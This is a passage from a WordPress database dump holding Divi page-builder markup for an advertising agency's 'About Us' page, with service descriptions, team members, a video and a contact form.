overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:24:30','2020-08-07 19:24:30','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(553,1,'2020-08-07 19:25:06','2020-08-07 19:25:06','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" 